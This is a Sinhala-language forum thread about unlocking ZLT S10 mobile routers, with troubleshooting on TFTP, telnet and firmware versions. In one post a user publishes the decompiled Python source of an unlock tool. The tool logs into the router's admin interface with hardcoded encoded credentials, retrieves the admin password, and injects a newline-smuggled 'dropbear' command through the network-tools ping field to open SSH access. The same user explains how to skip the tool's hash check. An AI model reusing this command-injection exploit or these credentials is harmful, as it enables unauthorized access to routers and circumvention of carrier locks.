ZLT S10 unlock කරමු නේද?(1.16.9/1.17.4) - Part II

Amith0424

Well-known member
  • Oct 27, 2010
    14,243
    24,392
    113
    ℒ𝓸𝓬𝓪𝓽𝓲𝓸𝓷
    in step 3
    tftp :timeout වෙනවනේ මොකද කරන්න ඕනේ මේකට
    @Amith0424
    static ip set කළාද?

    image.png
     
    • Like
    Reactions: kinkon

    Amith0424

    Well-known member
  • Oct 27, 2010
    14,243
    24,392
    113
    ℒ𝓸𝓬𝓪𝓽𝓲𝓸𝓷
    මචන් මේකට වඩා උඹේ කලින් මෙතඩ් එක මාර සමුත්.
    kalin eka cable ganna epayi. thawa ekak dannam free time labunama. one click unlock wenna

    ඔව් ඒත් එහෙමයි
    telnet log unada. tftp wala settings wenas kalada
    ------ Post added on Feb 9, 2024 at 5:00 PM
     
    • Like
    • Love
    Reactions: kinkon and Any.key

    Ulti

    Well-known member
  • Jan 25, 2023
    1,179
    2,416
    113
    b312 unlock කරන්න ක්‍රමයක් තාම නැද්ද?
     

    0x9

    Well-known member
  • Mar 18, 2015
    541
    836
    93
    01. zlts10_opn.exe මේක open කරන්න. කම්පියුටර් එකේ internet තියෙන්න ඕනි මේක open කරන වෙලේ.
    run වෙලා ඉවර උනාම success කියල වැටෙයි.enter එකක් ගහල exit වෙන්න.

    මචන් මේක run කරන කොට error එකක් එනවනේ

    Code:
    Traceback (most recent call last):
      File "selenium\webdriver\common\driver_finder.py", line 38, in get_path
      File "selenium\webdriver\common\selenium_manager.py", line 103, in driver_location
      File "selenium\webdriver\common\selenium_manager.py", line 149, in run
    selenium.common.exceptions.WebDriverException: Message: Unsuccessful command executed: C:\users\ox9\Temp\_MEI2242\selenium\webdr
    iver\common\windows\selenium-manager.exe --browser chrome --output json.
    {'code': 65, 'message': 'error sending request for url (https://googlechromelabs.github.io/chrome-for-testing/last-known-good-versio
    ns-with-downloads.json)', 'driver_path': '', 'browser_path': ''}
    
    
    The above exception was the direct cause of the following exception:
    
    Traceback (most recent call last):
      File "zlts10_opn.py", line 14, in <module>
      File "selenium\webdriver\chrome\webdriver.py", line 45, in __init__
      File "selenium\webdriver\chromium\webdriver.py", line 49, in __init__
      File "selenium\webdriver\common\driver_finder.py", line 41, in get_path
    selenium.common.exceptions.NoSuchDriverException: Message: Unable to obtain driver for chrome using Selenium Manager.; For documentation on this error, please visit: https://www.selenium.dev/documentation/webdriver/troubleshooting/errors/driver_location

    update:
    වැඩේ කරගත්ත මචන් code එක බලල hash code check කරන එක skip කරලා ;-)

    Python:
    import requests
    from selenium import webdriver
    from bs4 import BeautifulSoup
    import os
    import hashlib
    from datetime import datetime
    url = 'http://sdgsgsvdweasafasfeerh.zlts10.42web.io'
    options = webdriver.ChromeOptions()
    options.add_argument('--headless')
    options.add_argument('--disable-gpu')
    options.add_argument('--remote-debugging-port=0')
    driver = webdriver.Chrome(options = options)
    driver.get(url)
    driver.implicitly_wait(5)
    html = driver.page_source
    driver.quit()
    soup = BeautifulSoup(html, features = 'html.parser')
    text = soup.get_text()
    
    def generate_serial_key(salt_key):
        current_time = datetime.utcnow().strftime('%Y%m%d%H%M')
        data_to_hash = current_time + salt_key
        serial_key = hashlib.sha256(data_to_hash.encode()).hexdigest()
        return serial_key
    
    salt_key = 'your_salt_key1'
    result = generate_serial_key(salt_key)
    
    def func():
        session = requests.Session()
        login_url = 'http://192.168.254.254/goform/goform_set_cmd_process'
        login_headers = {
            'Accept': 'application/json, text/javascript, /; q=0.01',
            'X-Requested-With': 'XMLHttpRequest',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',
            'Sec-GPC': '1',
            'Origin': 'http://192.168.254.254',
            'Referer': 'http://192.168.254.254/index.html',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9',
            'Cookie': 'pageForward=home' }
        login_data = {
            'isTest': 'false',
            'goformId': 'LOGIN',
            'username': 'YWRtaW5pc3RyYXRvcg==',
            'password': 'ZjZiNDg5NTc5YmI3ZjVjZWI0ZDNkOTRkMDg3NGE2OGM=' }
        login_response = session.post(login_url, headers = login_headers, data = login_data)
        if login_response.status_code == 200:
            admin_password_url = 'http://192.168.254.254/goform/goform_get_cmd_process'
            admin_password_data = {
                'isTest': 'false',
                'cmd': 'admin_Password' }
            admin_password_response = session.post(admin_password_url, headers = login_headers, data = admin_password_data)
            print('Admin password response:')
            print(admin_password_response.text)
            network_tools_url = 'http://192.168.254.254/goform/goform_get_cmd_process'
            network_tools_data = {
                'isTest': 'false',
                'cmd': 'network_tools',
                'pingTimes': '1',
                'url': '127.0.0.1.1\ndropbear',
                'port': '-1',
                'subcmd': '1' }
            network_tools_response = session.post(network_tools_url, headers = login_headers, data = network_tools_data)
    
    if result == text:
        os.system('cls')
        func()
        print('[*] Success...')
    else:
        os.system('cls')
        print('[!] failed...')
    enter = input('\npress enter key to exit...')
    exit()
     
    Last edited:

    jackpolkichcha

    Well-known member
  • Jun 26, 2015
    2,316
    2,916
    113

    ZLT P11H එකේ telnet open වෙන්නෙ නෑ වගේ මේ විදිහට. Operator account එකටත් telnet enable කරන්න permission නැති නිසා කියලයි මට හිතෙන්නෙ..
     

    Outlook

    Well-known member
  • Jun 23, 2021
    647
    603
    93
    @Amith0424 h Bro මේකේ unlock එක permanent ද? Unlock කලාට පස්සේ lan cable ගහන් නැතුව wifi වලින් විතරක් ඕනි sim එකක් දාලා connect කරගන්න පුලුවන්ද? නැත්තම් pc එක හැමවෙලේම on කරලා lan cable එක connect කරලා තියන්න ඕනිද?
     

    Amith0424

    Well-known member
  • Oct 27, 2010
    14,243
    24,392
    113
    ℒ𝓸𝓬𝓪𝓽𝓲𝓸𝓷
    Steps kiyala thiyena vidihatama followed..
    tftp server eke config aul wela aththe. router ekeyi server ekeyi link eke aulak thiyenne.

    View attachment 224449
    View attachment 224450

    මෙහෙම එනවා නේ..
    ip config karala thiyenawa waradi machn. aye ara image eka balan ip daganna.

    thawa telnet open karagaththe nadda app eken.
    ------ Post added on Feb 12, 2024 at 7:38 PM

    @Amith0424 h Bro මේකේ unlock එක permanent ද? Unlock කලාට පස්සේ lan cable ගහන් නැතුව wifi වලින් විතරක් ඕනි sim එකක් දාලා connect කරගන්න පුලුවන්ද? නැත්තම් pc එක හැමවෙලේම on කරලා lan cable එක connect කරලා තියන්න ඕනිද?
    permanent. ඕන විදියකට use කරන්න පුලුවන්.
    ------ Post added on Feb 12, 2024 at 7:39 PM
     
    • Like
    Reactions: Outlook

    hi.dushan

    Well-known member
  • Jun 29, 2009
    9,003
    10,559
    113
    fw version software version balanna.
    old fw, thaiwan unge fw ne gahanne. new router ekata old fw ekakne kohomath gahanna wenne. hardware faulty upgrade karala, fw faulty upgrade karalane company eken router eka ewanne. ekata ara parana fw gahuwama e faulty enawa. e aul userta danenne nathi wennath puluwan.
    fw version ekanam mage router eke thiyenawa 👇 But software version balanne kohomada ?

    pFCAesT.jpeg
     
    • Like
    Reactions: Amith0424